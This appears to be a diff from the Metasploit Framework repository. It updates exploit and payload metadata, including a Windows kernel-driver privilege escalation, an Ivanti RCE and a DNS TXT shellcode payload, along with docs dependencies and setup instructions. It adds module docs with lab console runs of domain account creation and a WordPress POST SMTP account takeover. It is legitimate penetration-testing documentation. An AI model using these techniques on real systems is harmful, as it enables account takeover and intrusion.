+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2024-11-06 09:13:51 +0000",
+    "path": "/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/cve_2024_35250_ks_driver",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "exploit_windows/local/dnsadmin_serverlevelplugindll": {
    "name": "DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation",
    "fullname": "exploit/windows/local/dnsadmin_serverlevelplugindll",
@@ -184547,6 +186357,59 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/misc/ivanti_agent_portal_cmdexec": {
+    "name": "Ivanti EPM Agent Portal Command Execution",
+    "fullname": "exploit/windows/misc/ivanti_agent_portal_cmdexec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-06-07",
+    "type": "exploit",
+    "author": [
+      "James Horseman",
+      "Zach Hanley",
+      "Spencer McIntyre"
+    ],
+    "description": "This module leverages an unauthenticated RCE in Ivanti's EPM Agent Portal where a RPC client can invoke a method\n          which will run an attacker-specified string on the remote target as NT AUTHORITY\\SYSTEM.\n          This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.",
+    "references": [
+      "CVE-2023-28324",
+      "URL-https://forums.ivanti.com/s/article/SA-2023-06-06-CVE-2023-28324?language=en_US",
+      "URL-https://github.com/horizon3ai/CVE-2023-28324"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-11-20 13:51:39 +0000",
+    "path": "/modules/exploits/windows/misc/ivanti_agent_portal_cmdexec.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/ivanti_agent_portal_cmdexec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/misc/ivanti_avalanche_mdm_bof": {
    "name": "Ivanti Avalanche MDM Buffer Overflow",
    "fullname": "exploit/windows/misc/ivanti_avalanche_mdm_bof",
@@ -215443,7 +217306,7 @@
      "Spencer McIntyre",
      "corelanc0d3r <peter.ve@corelan.be>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell.\n\nPerforms a TXT query against a series of DNS record(s) and executes the returned payload",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nPerforms a TXT query against a series of DNS record(s) and executes the returned x86 shellcode. The DNSZONE\noption is used as the base name to iterate over. The payload will first request the TXT contents of the a\nhostname, followed by b, then c, etc. until there are no more records. For each record that is returned, exactly\n255 bytes from it are copied into a buffer that is eventually executed. This buffer should be encoded using\nx86/alpha_mixed with the BufferRegister option set to EDI.",
    "references": [

    ],
@@ -242862,7 +244725,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-01-07 14:06:31 +0000",
+    "mod_time": "2024-11-25 08:19:36 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_hop_http.rb",
    "is_install_path": true,
    "ref_name": "windows/custom/reverse_hop_http",
@@ -243020,7 +244883,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-12-06 09:15:36 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_https_proxy.rb",
    "is_install_path": true,
    "ref_name": "windows/custom/reverse_https_proxy",
@@ -244003,7 +245866,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-01-07 14:06:31 +0000",
+    "mod_time": "2024-11-25 08:19:36 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_hop_http.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/reverse_hop_http",
@@ -244524,7 +246387,7 @@
    "author": [
      "corelanc0d3r <peter.ve@corelan.be>"
    ],
-    "description": "Performs a TXT query against a series of DNS record(s) and executes the returned payload",
+    "description": "Performs a TXT query against a series of DNS record(s) and executes the returned x86 shellcode. The DNSZONE\n        option is used as the base name to iterate over. The payload will first request the TXT contents of the a\n        hostname, followed by b, then c, etc. until there are no more records. For each record that is returned, exactly\n        255 bytes from it are copied into a buffer that is eventually executed. This buffer should be encoded using\n        x86/alpha_mixed with the BufferRegister option set to EDI.",
    "references": [

    ],
@@ -244534,7 +246397,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-01-07 14:06:31 +0000",
+    "mod_time": "2024-12-06 14:26:44 +0000",
    "path": "/modules/payloads/singles/windows/dns_txt_query_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/dns_txt_query_exec",
@@ -244570,7 +246433,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-01-07 14:06:31 +0000",
+    "mod_time": "2024-11-26 11:49:56 +0000",
    "path": "/modules/payloads/singles/windows/download_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/download_exec",
@@ -244722,7 +246585,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-11-28 06:39:07 +0000",
    "path": "/modules/payloads/singles/windows/messagebox.rb",
    "is_install_path": true,
    "ref_name": "windows/messagebox",
@@ -245189,7 +247052,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-01-07 14:06:31 +0000",
+    "mod_time": "2024-11-25 08:19:36 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_hop_http.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/reverse_hop_http",
@@ -245359,7 +247222,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-12-06 09:15:36 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_https_proxy.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/reverse_https_proxy",
@@ -251028,7 +252891,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-01-07 14:06:31 +0000",
+    "mod_time": "2024-11-25 08:19:36 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_hop_http.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/reverse_hop_http",
@@ -251801,7 +253664,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
    "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/custom/reverse_http",
@@ -251842,7 +253705,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
    "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/custom/reverse_https",
@@ -252269,7 +254132,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-08-03 17:10:11 +0000",
+    "mod_time": "2024-11-27 08:15:57 +0000",
    "path": "/modules/payloads/singles/windows/x64/messagebox.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/messagebox",
@@ -252559,7 +254422,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
    "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter/reverse_http",
@@ -252603,7 +254466,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
    "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter/reverse_https",
@@ -254345,7 +256208,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
    "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/vncinject/reverse_http",
@@ -254387,7 +256250,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
    "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/vncinject/reverse_https",
@@ -260922,7 +262785,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-01-15 14:56:46 +0000",
+    "mod_time": "2024-12-16 17:51:38 +0000",
    "path": "/modules/post/multi/recon/local_exploit_suggester.rb",
    "is_install_path": true,
    "ref_name": "multi/recon/local_exploit_suggester",
@@ -6,6 +6,7 @@ gem 'just-the-docs', github: 'rapid7/just-the-docs', branch: 'r7_ver_custom'
 #gem 'just-the-docs', path: '../../just-the-docs'
 gem 'webrick'
 gem 'rexml'
+gem 'jekyll-sass-converter', '~> 2.2.0'

 group :jekyll_plugins do
  gem 'jekyll-sitemap'
@@ -12,22 +12,22 @@ GIT
 GEM
  remote: https://rubygems.org/
  specs:
-    addressable (2.8.1)
-      public_suffix (>= 2.0.2, < 6.0)
+    addressable (2.8.7)
+      public_suffix (>= 2.0.2, < 7.0)
    byebug (11.1.3)
    coderay (1.1.3)
    colorator (1.1.0)
-    concurrent-ruby (1.1.10)
+    concurrent-ruby (1.3.4)
    em-websocket (0.5.3)
      eventmachine (>= 0.12.9)
      http_parser.rb (~> 0)
    eventmachine (1.2.7)
-    ffi (1.15.5)
+    ffi (1.17.0)
    forwardable-extended (2.6.0)
    http_parser.rb (0.8.0)
-    i18n (1.12.0)
+    i18n (1.14.6)
      concurrent-ruby (~> 1.0)
-    jekyll (4.3.1)
+    jekyll (4.3.4)
      addressable (~> 2.4)
      colorator (~> 1.0)
      em-websocket (~> 0.5)
@@ -53,46 +53,45 @@ GEM
      jekyll (>= 3.7, < 5.0)
    jekyll-watch (2.2.1)
      listen (~> 3.0)
-    kramdown (2.4.0)
-      rexml
+    kramdown (2.5.1)
+      rexml (>= 3.3.9)
    kramdown-parser-gfm (1.1.0)
      kramdown (~> 2.0)
-    liquid (4.0.3)
-    listen (3.7.1)
+    liquid (4.0.4)
+    listen (3.9.0)
      rb-fsevent (~> 0.10, >= 0.10.3)
      rb-inotify (~> 0.9, >= 0.9.10)
    mercenary (0.4.0)
-    method_source (1.0.0)
+    method_source (1.1.0)
    pathutil (0.16.2)
      forwardable-extended (~> 2.6)
-    pry (0.14.1)
+    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.1)
-    rake (13.0.6)
+    public_suffix (6.0.1)
+    rake (13.2.1)
    rb-fsevent (0.11.2)
-    rb-inotify (0.10.1)
+    rb-inotify (0.11.1)
      ffi (~> 1.0)
-    rexml (3.3.6)
-      strscan
-    rouge (4.0.0)
+    rexml (3.3.9)
+    rouge (4.5.1)
    safe_yaml (1.0.5)
    sassc (2.4.0)
      ffi (~> 1.9)
-    strscan (3.1.0)
    terminal-table (3.0.2)
      unicode-display_width (>= 1.1.1, < 3)
-    unicode-display_width (2.3.0)
-    webrick (1.7.0)
+    unicode-display_width (2.6.0)
+    webrick (1.9.1)

 PLATFORMS
  ruby

 DEPENDENCIES
  jekyll (~> 4.3.0)
+  jekyll-sass-converter (~> 2.2.0)
  jekyll-sitemap
  just-the-docs!
  pry-byebug
@@ -103,4 +102,4 @@ DEPENDENCIES
  webrick

 BUNDLED WITH
-   2.2.22
+   2.5.10
@@ -59,6 +59,7 @@ Example:
 | CONFIG_CHANGES | Module modifies some config file |
 | IOC_IN_LOGS | Module leaves an indicator of compromise in the log(s) |
 | ACCOUNT_LOCKOUTS | Module may cause an account to lock out |
+| ACCOUNT_LOGOUT | Module may cause an existing valid session to be forced to log out (likely due to restrictions on concurrent sessions)|
 | SCREEN_EFFECTS | Module shows something on the screen that a human may notice |
 | PHYSICAL_EFFECTS | Module may produce physical effects in hardware (Examples: light, sound, or heat) |
 | AUDIO_EFFECTS | Module may cause a noise (Examples: Audio output from the speakers or hardware beeps) |
@@ -75,7 +75,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
 - `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow constrained delegation.
 - `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
+- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This is needed - as without this BASEDN prefix we often miss certain entries.
 - `ENUM_DOMAIN` - Dump info about the Active Directory domain.
 - `ENUM_DOMAIN_CONTROLLERS` - Dump all known domain controllers.
 - `ENUM_EXCHANGE_RECIPIENTS` - Dump info about all known Exchange recipients.
@@ -96,6 +96,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_USER_PASSWORD_NEVER_EXPIRES` - Dump info about all users whose password never expires.
 - `ENUM_USER_PASSWORD_NOT_REQUIRED` - Dump info about all users whose password never expires and whose account is still enabled.
 - `ENUM_USER_SPNS_KERBEROAST` - Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.
+- `ENUM_PRE_WINDOWS_2000_COMPUTERS` - Dump info about all computer objects likely created as a "pre-Windows 2000 computer", for which the password might be predictable.

 ### Kerberos Authentication

@@ -169,7 +169,7 @@ Local File System Commands
 This session also works with the following modules:

  auxiliary/admin/dcerpc/icpr_cert
-  auxiliary/admin/dcerpc/samr_computer
+  auxiliary/admin/dcerpc/samr_account
  auxiliary/admin/smb/delete_file
  auxiliary/admin/smb/download_file
  auxiliary/admin/smb/psexec_ntdsgrab
@@ -30,10 +30,29 @@ sudo apt update && sudo apt install -y git autoconf build-essential libpcap-dev

 ### Windows

-If you are running a Windows machine
+#### Windows 10 or above

-* Install [chocolatey](https://chocolatey.org/)
-* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.0.3-1/rubyinstaller-devkit-3.0.3-1-x64.exe)
+* Install [winget](https://learn.microsoft.com/en-us/windows/package-manager/winget/)
+* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.6-1/rubyinstaller-devkit-3.3.6-1-x64.exe)
+* Install pcaprub dependencies from your PowerShell terminal:
+
+```
+[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')
+
+Expand-Archive -Path "C:\Windows\Temp\WpdPack_4_1_2.zip" -DestinationPath "C:\"
+```
+
+Install a version of PostgreSQL:
+
+```
+Install-Module -Name Microsoft.WinGet.Client
+Install-WinGetPackage -id PostgreSQL.PostgreSQL.17
+```
+
+#### Pre-Windows 10
+
+* Install [choco](https://chocolatey.org/install)
+* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.6-1/rubyinstaller-devkit-3.3.6-1-x64.exe)
 * Install pcaprub dependencies from your cmd.exe terminal:

 ```
@@ -46,7 +65,7 @@ choco install 7zip
 Install a version of PostgreSQL:

 ```
-choco install postgresql12
+choco install postgresql17
 ```

 ## Set up your local copy of the repository
@@ -82,7 +101,9 @@ git config --global user.email "$GITHUB_EMAIL"
 git config --global github.user "$GITHUB_USERNAME"
 ```

-* Set up [msftidy] to run before each `git commit` and after each `git merge` to quickly identify potential issues with your contributions:
+- Set up [msftidy] to run before each `git commit` and after each `git merge` to quickly identify potential issues with your contributions:
+
+#### Linux

 ```bash
 cd ~/git/metasploit-framework
@@ -90,8 +111,20 @@ ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit
 ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/post-merge
 ```

+#### Windows
+
+```powershell
+cd ~/git/metasploit-framework
+mkdir .githooks
+git config --local core.hooksPath .githooks/
+New-Item -Path pre-commit -ItemType SymbolicLink -Value ..\tools\dev\pre-commit-hook.rb
+New-Item -Path post-merge -ItemType SymbolicLink -Value ..\tools\dev\pre-commit-hook.rb
+```
+
 ## Install Ruby

+ **Note:** If you are using Windows, ruby installed in [Install dependencies](#install-dependencies) section, so you can skip this section
+
 Linux distributions do not ship with the latest Ruby, nor are package managers routinely updated.  Additionally, if you are working with multiple Ruby projects, each one has dependencies and Ruby versions which can start to conflict.  For these reasons, it is advisable  to use a Ruby manager.

 You could just install Ruby directly (eg. `sudo apt install ruby-dev`), but you may likely end up with the incorrect version and no way to update.  Instead, consider using one of the many different [Ruby environment managers] available.  The Metasploit team prefers [rbenv] and [rvm] (note that [rvm] does require a re-login to complete).
@@ -0,0 +1,109 @@
+## Vulnerable Application
+Add, lookup and delete user / machine accounts via MS-SAMR. By default standard active directory users can add up to 10
+new computers to the domain (MachineAccountQuota). Administrative privileges however are required to delete the created
+accounts, or to create/delete user accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `ACCOUNT_NAME` option for `DELETE_ACCOUNT` and `LOOKUP_ACCOUNT` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### ACCOUNT_NAME
+
+The account name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`ADD_USER`, `LOOKUP_ACCOUNT` and `DELETE_ACCOUNT` actions. If left blank for `ADD_COMPUTER`, a random, realistic name
+will be generated.
+
+### ACCOUNT_PASSWORD
+
+The password for the new account. This option is only used for the `ADD_COMPUTER` and `ADD_USER` actions. If left 
+blank, a random value will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `ACCOUNT_NAME` is set, that value will be
+used and the module will fail if the specified name is already in use. If `ACCOUNT_NAME` is *not* set, a random value
+will be used.
+
+### ADD_USER
+
+Add a new user to the domain. The account being used to create the new user must have permission to do so. 
+
+After the user account is created, the password will be set for it. The `ACCOUNT_NAME` option must be set to the name of
+the account to create. The module will fail if the specified name is already in use.
+
+### DELETE_ACCOUNT
+
+Delete a user or computer account from the domain. This action requires that the `ACCOUNT_NAME` option be set.
+
+### LOOKUP_ACCOUNT
+
+Lookup a user or computer account in the domain. This action verifies that the specified account exists, and looks up
+its security ID (SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_account) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_account) > show options
+
+Module options (auxiliary/admin/dcerpc/samr_account):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ACCOUNT _NAME                      no        The computer name
+   ACCOUNT_PASSWORD                   no        The password for the new computer
+   RHOSTS            192.168.159.96   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT             445              yes       The target port (TCP)
+   SMBDomain         .                no        The Windows domain to use for authentication
+   SMBPass           Password1        no        The password for the specified username
+   SMBUser           aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_account) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_account) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password
+
+msf6 auxiliary(admin/dcerpc/samr_account) >
+```
@@ -1,100 +0,0 @@
-## Vulnerable Application
-Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
-computers to the domain. Administrative privileges however are required to delete the created accounts.
-
-## Verification Steps
-
-1. From msfconsole
-2. Do: `use auxiliary/admin/dcerpc/samr_computer`
-3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
-   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
-4. Run the module and see that a new machine account was added
-
-## Options
-
-### SMBDomain
-
-The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
-default value.
-
-### COMPUTER_NAME
-
-The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
-`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
-
-### COMPUTER_PASSWORD
-
-The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
-will be generated.
-
-## Actions
-
-### ADD_COMPUTER
-
-Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
-user has exceeded the maximum number of computer accounts that they are allowed to create.
-
-After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
-used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
-will be used.
-
-### DELETE_COMPUTER
-
-Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
-
-### LOOKUP_COMPUTER
-
-Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
-(SID), which includes the relative ID (RID) as the last component.
-
-## Scenarios
-
-### Windows Server 2019
-
-First, a new computer account is created and its details are logged to the database.
-
-```
-msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
-RHOSTS => 192.168.159.96
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
-SMBUser => aliddle
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
-SMBPass => Password1
-msf6 auxiliary(admin/dcerpc/samr_computer) > show options
-
-Module options (auxiliary/admin/dcerpc/samr_computer):
-
-   Name               Current Setting  Required  Description
-   ----               ---------------  --------  -----------
-   COMPUTER_NAME                       no        The computer name
-   COMPUTER_PASSWORD                   no        The password for the new computer
-   RHOSTS             192.168.159.96   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT              445              yes       The target port (TCP)
-   SMBDomain          .                no        The Windows domain to use for authentication
-   SMBPass            Password1        no        The password for the specified username
-   SMBUser            aliddle          no        The username to authenticate as
-
-
-Auxiliary action:
-
-   Name          Description
-   ----          -----------
-   ADD_COMPUTER  Add a computer account
-
-
-msf6 auxiliary(admin/dcerpc/samr_computer) > run
-[*] Running module against 192.168.159.96
-
-[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
-[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
-[*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/samr_computer) > creds
-Credentials
-===========
-
-host            origin          service        public             private                           realm   private_type  JtR Format
----            ------          -------        ------             -------                           -----   ------------  ----------
-192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password
-
-msf6 auxiliary(admin/dcerpc/samr_computer) >
-```
@@ -0,0 +1,105 @@
+## Vulnerable Application
+
+The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege
+escalation where an unauthenticated user is able to reset the password
+of an arbitrary user. This is done by requesting a password reset, then
+viewing the latest email logs to find the associated password reset email.
+
+### Install
+
+1. Create `wp_post_smtp_acct_takeover.docker-compose.yml` with the content:
+```
+version: '3.1'
+
+services:
+  wordpress:
+    image: wordpress:latest
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: chocapikk
+      WORDPRESS_DB_PASSWORD: dummy_password
+      WORDPRESS_DB_NAME: exploit_market
+    mem_limit: 512m
+    volumes:
+      - wordpress:/var/www/html
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exploit_market
+      MYSQL_USER: chocapikk
+      MYSQL_PASSWORD: dummy_password
+      MYSQL_RANDOM_ROOT_PASSWORD: '1'
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+
+```
+2. `docker-compose -f wp_post_smtp_acct_takeover.docker-compose.yml up`
+3. `wget https://downloads.wordpress.org/plugin/post-smtp.2.8.6.zip`
+4. `unzip post-smtp.2.8.6.zip`
+5. `docker cp post-smtp <wordpress_container_id>:/var/www/html/wp-content/plugins`
+6. Complete the setup of wordpress
+7. Enable the post-smtp plugin, select "default" for the SMTP service
+  1. Complete the setup using random information, it isn't validated.
+8. Update permalink structure per https://github.com/rapid7/metasploit-framework/pull/18164#issuecomment-1623744244
+  1. Settings -> Permalinks -> Permalink structure -> Select "Post name" -> Save Changes.
+
+
+## Verification Steps
+
+1. Install the vulnerable plugin
+2. Start msfconsole
+3. Do: `use auxiliary/admin/http/wp_post_smtp_acct_takeover`
+4. Do: `set rhost 127.0.0.1`
+5. Do: `set rport 5555`
+6. Do: `set ssl false`
+7. Do: `set username <username>`
+8. Do: `set verbose true`
+9. Do: `run`
+10. Visit the output URL to reset the user's password.
+
+## Options
+
+### USERNAME
+
+The username to perform a password reset against
+
+## Scenarios
+
+### Wordpress 6.6.2 with SMTP Post 2.8.6 on Docker
+
+```
+msf6 > use auxiliary/admin/http/wp_post_smtp_acct_takeover
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rport 5555
+rport => 5555
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set ssl false
+ssl => false
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set username admin
+username => admin
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set verbose true
+verbose => true
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/post-smtp/readme.txt
+[*] Found version 2.8.6 in the plugin
+[+] The target appears to be vulnerable.
+[*] Attempting to Registering token fUefO7U12dXtb0DM on device GP3tOFuMfFErw
+[+] Succesfully created token: fUefO7U12dXtb0DM
+[*] Requesting logs
+[*] Requesting email content from logs for ID 4
+[+] Full text of log saved to: /home/mtcyr/.msf4/loot/20241029142103_default_127.0.0.1_wordpress.post_s_367186.txt
+[+] Reset URL: http://127.0.0.1:5555/wp-login.php?action=rp&key=4kxMwfuvyQtcUDVrh985&login=admin&wp_lang=en_US
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,39 @@
+## Introduction
+
+Allows changing or resetting users' passwords over the LDAP protocol (particularly for Active Directory).
+
+"Changing" refers to situations where you know the value of the existing password, and send that to the server as part of the password modification.
+"Resetting" refers to situations where you may not know the value of the existing password, but by virtue of your permissions over the target account, you can force-change the password without necessarily knowing it.
+
+Note that users can typically not reset their own passwords (unless they have very high privileges), but can usually change their password as long as they know the existing one.
+
+This module works with existing sessions (or relaying), especially for Resetting, wherein the target's password is not required.
+
+## Actions
+
+- `RESET` - Reset the target's password without knowing the existing one (requires appropriate permissions)
+- `CHANGE` - Change the user's password, knowing the existing one.
+
+## Options
+
+The required options are based on the action being performed:
+
+- When resetting a password, you must specify the `TARGET_USER`
+- When changing a password, you must specify the `USERNAME` and `PASSWORD`, even if using an existing session (since the API requires both of these to be specified, even for open LDAP sessions)
